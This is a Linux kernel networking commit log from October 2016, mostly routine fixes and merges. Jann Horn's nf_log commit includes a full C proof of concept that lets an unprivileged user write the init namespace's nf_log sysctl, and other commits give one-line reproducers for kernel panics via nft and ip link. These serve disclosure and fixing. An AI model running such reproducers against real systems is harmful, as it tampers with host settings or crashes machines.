Commit Graph

43750 Commits

Author SHA1 Message Date
David S. Miller
0d818c2889 RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV/YbX/Sw1s6N8H32AQLwDg//W0fGt3OSFrOpEQHtKUSCWO3m4RRJgn/m
 Xbaz8ZO6Z8qmdkM267yrLCAp5hx0E77WP46l7V3B9p9wX0vA+P2QO7K5Kis6sNaY
 aceCCAKHqvUSiZa8tQ2aGpbxxa8qICbjHjiCg0lFABiGDWGRnIBNW8qV5LyGKZkI
 7b3i9MGBkGLdZxetcJd498j6Gck9cuqOZDnfqgb0Q5pAtsjVM3EZXXsHO1ZD5WHG
 GUieQgY9Tp0rlVKjlLdR94fW/acMZYs0c5RO1uzGAoUeBALnSUS5+bSRSlGp1KOM
 C7r5/dK4FvkZY+xuS5pLXoI8WpsA4EDpBINGdO6L03wTJ10zx5y5CdTTl7G6Y53R
 BpmY8SDFmWYqpJs+gZiWYIlbnBQ+b0Mu7p7rKeSJS/q0+YEVwJlz3UFo2k1O+J3A
 ovpxP5E6IvOjlKF21Zs1hOR2m/sfR42v/TfwpApImSeY2k2m8vzyfXBJP4ClAk29
 PGYOOqMLYwzIjLwdapDxL3ccjKvOwYeClCs1t6bKva2XCrF1ybtBnAQDxFp6KzXi
 p/y/QkHnseSeYct8mElDopRekbwoqa9YPwXn7lagvQhNxqNGIR4HT82IeohI/Dqe
 GtQbjSPc3uebk5lRf535kTZixu+l5/yKQeuRTsfoIgsMjVlMdqS9dUAphzI4IXLp
 FE0q49uLTVI=
 =+Jr3
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20161004' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Fixes

This set of patches contains a bunch of fixes:

 (1) Fix an oops on incoming call to a local endpoint without a bound
     service.

 (2) Only ping for a lost reply in a client call (this is inapplicable to
     service calls).

 (3) Fix maybe uninitialised variable warnings in the ACK/ABORT sending
     function by splitting it.

 (4) Fix loss of PING RESPONSE ACKs due to them being subsumed by PING ACK
     generation.

 (5) OpenAFS improperly terminates calls it makes as a client under some
     circumstances by not fully hard-ACK'ing the last DATA packets.  This
     is alleviated by a new call appearing on the same channel implicitly
     completing the previous call on that channel.  Handle this implicit
     completion.

 (6) Properly handle expiry of service calls due to the aforementioned
     improper termination with no follow up call to implicitly complete it:

     (a) The call's background processor needs to be queued to complete the
     	 call, send an abort and notify the socket.

     (b) The call's background processor needs to notify the socket (or the
     	 kernel service) when it has completed the call.

     (c) A negative error code must thence be returned to the kernel
     	 service so that it knows the call died.

     (d) The AFS filesystem must detect the fatal error and end the call.

 (7) Must produce a DELAY ACK when the actual service operation takes a
     while to process and must cancel the ACK when the reply is ready.

 (8) Don't request an ACK on the last DATA packet of the Tx phase as this
     confuses OpenAFS.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 21:04:24 -04:00
Eric Dumazet
d35c99ff77 netlink: do not enter direct reclaim from netlink_dump()
Since linux-3.15, netlink_dump() can use up to 16384 bytes skb
allocations.

Due to struct skb_shared_info ~320 bytes overhead, we end up using
order-3 (on x86) page allocations, that might trigger direct reclaim and
add stress.

The intent was really to attempt a large allocation but immediately
fallback to a smaller one (order-1 on x86) in case of memory stress.

On recent kernels (linux-4.4), we can remove __GFP_DIRECT_RECLAIM to
meet the goal. Old kernels would need to remove __GFP_WAIT

While we are at it, since we do an order-3 allocation, allow to use
all the allocated bytes instead of 16384 to reduce syscalls during
large dumps.

iproute2 already uses 32KB recvmsg() buffer sizes.

Alexei provided an initial patch downsizing to SKB_WITH_OVERHEAD(16384)

Fixes: 9063e21fb0 ("netlink: autosize skb lengthes")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Alexei Starovoitov <ast@kernel.org>
Cc: Greg Thelen <gthelen@google.com>
Reviewed-by: Greg Rose <grose@lightfleet.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 20:53:13 -04:00
Anoob Soman
6664498280 packet: call fanout_release, while UNREGISTERING a netdev
If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.

This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()

Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 20:50:18 -04:00
Linus Torvalds
14986a34e1 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/user-namespace
Pull namespace updates from Eric Biederman:
 "This set of changes is a number of smaller things that have been
  overlooked in other development cycles focused on more fundamental
  change. The devpts changes are small things that were a distraction
  until we managed to kill off DEVPTS_MULTPLE_INSTANCES. There is an
  trivial regression fix to autofs for the unprivileged mount changes
  that went in last cycle. A pair of ioctls has been added by Andrey
  Vagin making it is possible to discover the relationships between
  namespaces when referring to them through file descriptors.

  The big user visible change is starting to add simple resource limits
  to catch programs that misbehave. With namespaces in general and user
  namespaces in particular allowing users to use more kinds of
  resources, it has become important to have something to limit errant
  programs. Because the purpose of these limits is to catch errant
  programs the code needs to be inexpensive to use as it always on, and
  the default limits need to be high enough that well behaved programs
  on well behaved systems don't encounter them.

  To this end, after some review I have implemented per user per user
  namespace limits, and use them to limit the number of namespaces. The
  limits being per user mean that one user can not exhause the limits of
  another user. The limits being per user namespace allow contexts where
  the limit is 0 and security conscious folks can remove from their
  threat anlysis the code used to manage namespaces (as they have
  historically done as it root only). At the same time the limits being
  per user namespace allow other parts of the system to use namespaces.

  Namespaces are increasingly being used in application sand boxing
  scenarios so an all or nothing disable for the entire system for the
  security conscious folks makes increasing use of these sandboxes
  impossible.

  There is also added a limit on the maximum number of mounts present in
  a single mount namespace. It is nontrivial to guess what a reasonable
  system wide limit on the number of mount structure in the kernel would
  be, especially as it various based on how a system is using
  containers. A limit on the number of mounts in a mount namespace
  however is much easier to understand and set. In most cases in
  practice only about 1000 mounts are used. Given that some autofs
  scenarious have the potential to be 30,000 to 50,000 mounts I have set
  the default limit for the number of mounts at 100,000 which is well
  above every known set of users but low enough that the mount hash
  tables don't degrade unreaonsably.

  These limits are a start. I expect this estabilishes a pattern that
  other limits for resources that namespaces use will follow. There has
  been interest in making inotify event limits per user per user
  namespace as well as interest expressed in making details about what
  is going on in the kernel more visible"

* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/user-namespace: (28 commits)
  autofs:  Fix automounts by using current_real_cred()->uid
  mnt: Add a per mount namespace limit on the number of mounts
  netns: move {inc,dec}_net_namespaces into #ifdef
  nsfs: Simplify __ns_get_path
  tools/testing: add a test to check nsfs ioctl-s
  nsfs: add ioctl to get a parent namespace
  nsfs: add ioctl to get an owning user namespace for ns file descriptor
  kernel: add a helper to get an owning user namespace for a namespace
  devpts: Change the owner of /dev/pts/ptmx to the mounter of /dev/pts
  devpts: Remove sync_filesystems
  devpts: Make devpts_kill_sb safe if fsi is NULL
  devpts: Simplify devpts_mount by using mount_nodev
  devpts: Move the creation of /dev/pts/ptmx into fill_super
  devpts: Move parse_mount_options into fill_super
  userns: When the per user per user namespace limit is reached return ENOSPC
  userns; Document per user per user namespace limits.
  mntns: Add a limit on the number of mount namespaces.
  netns: Add a limit on the number of net namespaces
  cgroupns: Add a limit on the number of cgroup namespaces
  ipcns: Add a  limit on the number of ipc namespaces
  ...
2016-10-06 09:52:23 -07:00
David Howells
bf7d620abf rxrpc: Don't request an ACK on the last DATA packet of a call's Tx phase
Don't request an ACK on the last DATA packet of a call's Tx phase as for a
client there will be a reply packet or some sort of ACK to shift phase.  If
the ACK is requested, OpenAFS sends a REQUESTED-ACK ACK with soft-ACKs in
it and doesn't follow up with a hard-ACK.

If we don't set the flag, OpenAFS will send a DELAY ACK that hard-ACKs the
reply data, thereby allowing the call to terminate cleanly.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:51 +01:00
David Howells
9749fd2bea rxrpc: Need to produce an ACK for service op if op takes a long time
We need to generate a DELAY ACK from the service end of an operation if we
start doing the actual operation work and it takes longer than expected.
This will hard-ACK the request data and allow the client to release its
resources.

To make this work:

 (1) We have to set the ack timer and propose an ACK when the call moves to
     the RXRPC_CALL_SERVER_ACK_REQUEST and clear the pending ACK and cancel
     the timer when we start transmitting the reply (the first DATA packet
     of the reply implicitly ACKs the request phase).

 (2) It must be possible to set the timer when the caller is holding
     call->state_lock, so split the lock-getting part of the timer function
     out.

 (3) Add trace notes for the ACK we're requesting and the timer we clear.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
cf69207afa rxrpc: Return negative error code to kernel service
In rxrpc_kernel_recv_data(), when we return the error number incurred by a
failed call, we must negate it before returning it as it's stored as
positive (that's what we have to pass back to userspace).

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
94bc669efa rxrpc: Add missing notification
The call's background processor work item needs to notify the socket when
it completes a call so that recvmsg() or the AFS fs can deal with it.
Without this, call expiry isn't handled.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
d7833d0091 rxrpc: Queue the call on expiry
When a call expires, it must be queued for the background processor to deal
with otherwise a service call that is improperly terminated will just sit
there awaiting an ACK and won't expire.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:50 +01:00
David Howells
b3156274ca rxrpc: Partially handle OpenAFS's improper termination of calls
OpenAFS doesn't always correctly terminate client calls that it makes -
this includes calls the OpenAFS servers make to the cache manager service.
It should end the client call with either:

 (1) An ACK that has firstPacket set to one greater than the seq number of
     the reply DATA packet with the LAST_PACKET flag set (thereby
     hard-ACK'ing all packets).  nAcks should be 0 and acks[] should be
     empty (ie. no soft-ACKs).

 (2) An ACKALL packet.

OpenAFS, though, may send an ACK packet with firstPacket set to the last
seq number or less and soft-ACKs listed for all packets up to and including
the last DATA packet.

The transmitter, however, is obliged to keep the call live and the
soft-ACK'd DATA packets around until they're hard-ACK'd as the receiver is
permitted to drop any merely soft-ACK'd packet and request retransmission
by sending an ACK packet with a NACK in it.

Further, OpenAFS will also terminate a client call by beginning the next
client call on the same connection channel.  This implicitly completes the
previous call.

This patch handles implicit ACK of a call on a channel by the reception of
the first packet of the next call on that channel.

If another call doesn't come along to implicitly ACK a call, then we have
to time the call out.  There are some bugs there that will be addressed in
subsequent patches.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
a5af7e1fc6 rxrpc: Fix loss of PING RESPONSE ACK production due to PING ACKs
Separate the output of PING ACKs from the output of other sorts of ACK so
that if we receive a PING ACK and schedule transmission of a PING RESPONSE
ACK, the response doesn't get cancelled by a PING ACK we happen to be
scheduling transmission of at the same time.

If a PING RESPONSE gets lost, the other side might just sit there waiting
for it and refuse to proceed otherwise.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
26cb02aa6d rxrpc: Fix warning by splitting rxrpc_send_call_packet()
Split rxrpc_send_data_packet() to separate ACK generation (which is more
complicated) from ABORT generation.  This simplifies the code a bit and
fixes the following warning:

In file included from ../net/rxrpc/output.c:20:0:
net/rxrpc/output.c: In function 'rxrpc_send_call_packet':
net/rxrpc/ar-internal.h:1187:27: error: 'top' may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/rxrpc/output.c:103:24: note: 'top' was declared here
net/rxrpc/output.c:225:25: error: 'hard_ack' may be used uninitialized in this function [-Werror=maybe-uninitialized]

Reported-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
a9f312d98a rxrpc: Only ping for lost reply in client call
When a reply is deemed lost, we send a ping to find out the other end
received all the request data packets we sent.  This should be limited to
client calls and we shouldn't do this on service calls.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
7212a57e8e rxrpc: Fix oops on incoming call to serviceless endpoint
If an call comes in to a local endpoint that isn't listening for any
incoming calls at the moment, an oops will happen.  We need to check that
the local endpoint's service pointer isn't NULL before we dereference it.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:49 +01:00
David Howells
19c0dbd540 rxrpc: Fix duplicate const
Remove a duplicate const keyword.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:48 +01:00
David Howells
b63452c11e rxrpc: Accesses of rxrpc_local::service need to be RCU managed
struct rxrpc_local->service is marked __rcu - this means that accesses of
it need to be managed using RCU wrappers.  There are two such places in
rxrpc_release_sock() where the value is checked and cleared.  Fix this by
using the appropriate wrappers.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-10-06 08:11:48 +01:00
David S. Miller
5bfb88a163 Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf-next
Pablo Neira Ayuso says:

====================
Netfilter fixes for net-next

This is a pull request to address fallout from previous nf-next pull
request, only fixes going on here:

1) Address a potential null dereference in nf_unregister_net_hook()
   when becomes nf_hook_entry_head is NULL, from Aaron Conole.

2) Missing ifdef for CONFIG_NETFILTER_INGRESS, also from Aaron.

3) Fix linking problems in xt_hashlimit in x86_32, from Pai.

4) Fix permissions of nf_log sysctl from unpriviledge netns, from
   Jann Horn.

5) Fix possible divide by zero in nft_limit, from Liping Zhang.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-05 20:15:55 -04:00
Johannes Berg
1e1430d528 Merge remote-tracking branch 'net-next/master' into mac80211-next
Resolve the merge conflict between Felix's/my and Toke's patches
coming into the tree through net and mac80211-next respectively.
Most of Felix's changes go away due to Toke's new infrastructure
work, my patch changes to "goto begin" (the label wasn't there
before) instead of returning NULL so flow control towards drivers
is preserved better.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-04 09:46:44 +02:00
Liping Zhang
2fa46c1301 netfilter: nft_limit: fix divided by zero panic
After I input the following nftables rule, a panic happened on my system:
  # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second

  divide error: 0000 [#1] SMP
  [ ... ]
  RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
  nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
  Call Trace:
  [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
  [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
  [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
  [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
  [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
  [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
  [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
  [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
  [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
  [<ffffffff81703d3c>] ip_local_out+0x1c/0x40

This is because divisor is 64-bit, but we treat it as a 32-bit integer,
then 0xf00000000 becomes zero, i.e. divisor becomes 0.

Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04 08:59:03 +02:00
Jann Horn
dbb5918cb3 netfilter: fix namespace handling in nf_log_proc_dostring
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-04 08:41:06 +02:00
Gavin Shan
c0cd1ba4f8 net/ncsi: Introduce ncsi_stop_dev()
This introduces ncsi_stop_dev(), as counterpart to ncsi_start_dev(),
to stop the NCSI device so that it can be reenabled in future. This
API should be called when the network device driver is going to
shutdown the device. There are 3 things done in the function: Stop
the channel monitoring; Reset channels to inactive state; Report
NCSI link down.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:51 -04:00
Gavin Shan
83afdc6aad net/ncsi: Rework the channel monitoring
The original NCSI channel monitoring was implemented based on a
backoff algorithm: the GLS response should be received in the
specified interval. Otherwise, the channel is regarded as dead
and failover should be taken if current channel is an active one.
There are several problems in the implementation: (A) On BCM5718,
we found when the IID (Instance ID) in the GLS command packet
changes from 255 to 1, the response corresponding to IID#1 never
comes in. It means we cannot make the unfair judgement that the
channel is dead when one response is missed. (B) The code's
readability should be improved. (C) We should do failover when
current channel is active one and the channel monitoring should
be marked as disabled before doing failover.

This reworks the channel monitoring to address all above issues.
The fields for channel monitoring is put into separate struct
and the state of channel monitoring is predefined. The channel
is regarded alive if the network controller responses to one of
two GLS commands or both of them in 5 seconds.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:51 -04:00
Gavin Shan
a0509cbeef net/ncsi: Allow to extend NCSI request properties
There is only one NCSI request property for now: the response for
the sent command need drive the workqueue or not. So we had one
field (@driven) for the purpose. We lost the flexibility to extend
NCSI request properties.

This replaces @driven with @flags and @req_flags in NCSI request
and NCSI command argument struct. Each bit of the newly introduced
field can be used for one property. No functional changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
a15af54f8f net/ncsi: Rework request index allocation
The NCSI request index (struct ncsi_request::id) is put into instance
ID (IID) field while sending NCSI command packet. It was designed the
available IDs are given in round-robin fashion. @ndp->request_id was
introduced to represent the next available ID, but it has been used
as number of successively allocated IDs. It breaks the round-robin
design. Besides, we shouldn't put 0 to NCSI command packet's IID
field, meaning ID#0 should be reserved according section 6.3.1.1
in NCSI spec (v1.1.0).

This fixes above two issues. With it applied, the available IDs will
be assigned in round-robin fashion and ID#0 won't be assigned.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
55e02d0837 net/ncsi: Don't probe on the reserved channel ID (0x1f)
We needn't send CIS (Clear Initial State) command to the NCSI
reserved channel (0x1f) in the enumeration. We shouldn't receive
a valid response from CIS on NCSI channel 0x1f.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
bc7e0f50aa net/ncsi: Introduce NCSI_RESERVED_CHANNEL
This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel
ID (0x1f). No logical changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Gavin Shan
d8cedaabe7 net/ncsi: Avoid unused-value build warning from ia64-linux-gcc
xchg() is used to set NCSI channel's state in order for consistent
access to the state. xchg()'s return value should be used. Otherwise,
one build warning will be raised (with -Wunused-value) as below message
indicates. It is reported by ia64-linux-gcc (GCC) 4.9.0.

 net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor':
 arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \
 not used [-Wunused-value]
  ((__typeof__(*(ptr))) __xchg((unsigned long) (x), (ptr), sizeof(*(ptr))))
   ^
 net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg'
  xchg(&nc->state, NCSI_CHANNEL_INACTIVE);

This removes the atomic access to NCSI channel's state avoid the above
build warning. We have to hold the channel's lock when its state is readed
or updated. No functional changes introduced.

Signed-off-by: Gavin Shan <gwshan@linux.vnet.ibm.com>
Reviewed-by: Joel Stanley <joel@jms.id.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:11:50 -04:00
Andrew Collins
93409033ae net: Add netdev all_adj_list refcnt propagation to fix panic
This is a respin of a patch to fix a relatively easily reproducible kernel
panic related to the all_adj_list handling for netdevs in recent kernels.

The following sequence of commands will reproduce the issue:

ip link add link eth0 name eth0.100 type vlan id 100
ip link add link eth0 name eth0.200 type vlan id 200
ip link add name testbr type bridge
ip link set eth0.100 master testbr
ip link set eth0.200 master testbr
ip link add link testbr mac0 type macvlan
ip link delete dev testbr

This creates an upper/lower tree of (excuse the poor ASCII art):

            /---eth0.100-eth0
mac0-testbr-
            \---eth0.200-eth0

When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
reference to eth0 is added, so this results in a panic.

This change adds reference count propagation so things are handled properly.

Matthias Schiffer reported a similar crash in batman-adv:

https://github.com/freifunk-gluon/gluon/issues/680
https://www.open-mesh.org/issues/247

which this patch also seems to resolve.

Signed-off-by: Andrew Collins <acollins@cradlepoint.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-04 02:05:31 -04:00
Shmulik Ladkani
b6a7920848 net: skbuff: Limit skb_vlan_pop/push() to expect skb->data at mac header
skb_vlan_pop/push were too generic, trying to support the cases where
skb->data is at mac header, and cases where skb->data is arbitrarily
elsewhere.

Supporting an arbitrary skb->data was complex and bogus:
 - It failed to unwind skb->data to its original location post actual
   pop/push.
   (Also, semantic is not well defined for unwinding: If data was into
    the eth header, need to use same offset from start; But if data was
    at network header or beyond, need to adjust the original offset
    according to the push/pull)
 - It mangled the rcsum post actual push/pop, without taking into account
   that the eth bytes might already have been pulled out of the csum.

Most callers (ovs, bpf) already had their skb->data at mac_header upon
invoking skb_vlan_pop/push.
Last caller that failed to do so (act_vlan) has been recently fixed.

Therefore, to simplify things, no longer support arbitrary skb->data
inputs for skb_vlan_pop/push().

skb->data is expected to be exactly at mac_header; WARN otherwise.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 21:41:40 -04:00
Shmulik Ladkani
f39acc84aa net/sched: act_vlan: Push skb->data to mac_header prior calling skb_vlan_*() functions
Generic skb_vlan_push/skb_vlan_pop functions don't properly handle the
case where the input skb data pointer does not point at the mac header:

- They're doing push/pop, but fail to properly unwind data back to its
  original location.
  For example, in the skb_vlan_push case, any subsequent
  'skb_push(skb, skb->mac_len)' calls make the skb->data point 4 bytes
  BEFORE start of frame, leading to bogus frames that may be transmitted.

- They update rcsum per the added/removed 4 bytes tag.
  Alas if data is originally after the vlan/eth headers, then these
  bytes were already pulled out of the csum.

OTOH calling skb_vlan_push/skb_vlan_pop with skb->data at mac_header
present no issues.

act_vlan is the only caller to skb_vlan_*() that has skb->data pointing
at network header (upon ingress).
Other calles (ovs, bpf) already adjust skb->data at mac_header.

This patch fixes act_vlan to point to the mac_header prior calling
skb_vlan_*() functions, as other callers do.

Signed-off-by: Shmulik Ladkani <shmulik.ladkani@gmail.com>
Cc: Daniel Borkmann <daniel@iogearbox.net>
Cc: Pravin Shelar <pshelar@ovn.org>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 21:40:50 -04:00
David S. Miller
7667d445fa RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV+7Zg/Sw1s6N8H32AQIprA//ewnCeNT3m53au7molP/KWgqkTUJYXjW0
 tdUjebDGB50UyFVj+f/oHowu4ylYg6DiCjkfidr7Mc1ngnzJjgZUGOIq4OACFa5H
 lVfUM9okpSKWz61/ljq0Li70j4HscFVC3efXyfF25vTeCpqKSxtqNypwOB4KE5fu
 hv2a5IxBJnY4XVKNhC94NiqZ7SFmtb6RPk/M8Tm9rB0C4haq3WGH2Fp5iobcs3+F
 8u+UPOPZ+n2UAWMCxg8os4iDi2Uec0sQRPVZZbbTQN2uwzjZS1Jqx/Wf5Fbz0C9x
 mV7N9HtKEznt7HTo0pUN6B1kEE3GbkFnCDUTASclg5CkN0G1ptB3QdFv22UCyoNK
 9DvfUUWR+TGnLlrwyzaxBCcg1Cz2YgPahoowMD5iTA8IpLbB51beyeL09N6w+iPO
 BpqYd31y3ie3qH3FYYJdsAxCtYvRvABme+D3GHvlbleVMBRqbNAxt0JZxghK4IfX
 P4qw+L6ylNZTDO10bgZpJyGDe9kvxy/kuHiid7jYTuRdyHwt2RoRJGKMAQinDDpV
 XJHfMXQKbSIoCfMNN7aWv08BMxIrXmkwDQAdf2XVcy9sGy1yDnMCxdKqcXNX19ax
 Co86ZHz9t8kJ/Um3v1wEo77T2/JP4CuqvbN/nMcU3Ll/u2tPyDXzqs7xWkdSdV7W
 GC4AdqT3LAo=
 =dmH+
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20160930' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: More fixes and adjustments

This set of patches contains some more fixes and adjustments:

 (1) Actually display the retransmission indication previously added to the
     tx_data trace.

 (2) Switch to Congestion Avoidance mode properly at cwnd==ssthresh rather
     than relying on detection during an overshoot and correction.

 (3) Reduce ssthresh to the peer's declared receive window.

 (4) The offset field in rxrpc_skb_priv can be dispensed with and the error
     field is no longer used.  Get rid of them.

 (5) Keep the call timeouts as ktimes rather than jiffies to make it easier
     to deal with RTT-based timeout values in future.  Rounding to jiffies
     is still necessary when the system timer is set.

 (6) Fix the call timer handling to avoid retriggering of expired timeout
     actions.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:02:17 -04:00
Jiri Benc
85de4a2101 openvswitch: use mpls_hdr
skb_mpls_header is equivalent to mpls_hdr now. Use the existing helper
instead.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:22 -04:00
Jiri Benc
9095e10edd mpls: move mpls_hdr to a common location
This will be also used by openvswitch.

Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: David Ahern <dsa@cumulusnetworks.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:21 -04:00
Jiri Benc
f7d49bce8e openvswitch: mpls: set network header correctly on key extract
After the 48d2ab609b ("net: mpls: Fixups for GSO"), MPLS handling in
openvswitch was changed to have network header pointing to the start of the
MPLS headers and inner_network_header pointing after the MPLS headers.

However, key_extract was missed by the mentioned commit, causing incorrect
headers to be set when a MPLS packet just enters the bridge or after it is
recirculated.

Fixes: 48d2ab609b ("net: mpls: Fixups for GSO")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Acked-by: Pravin B Shelar <pshelar@ovn.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-03 02:00:21 -04:00
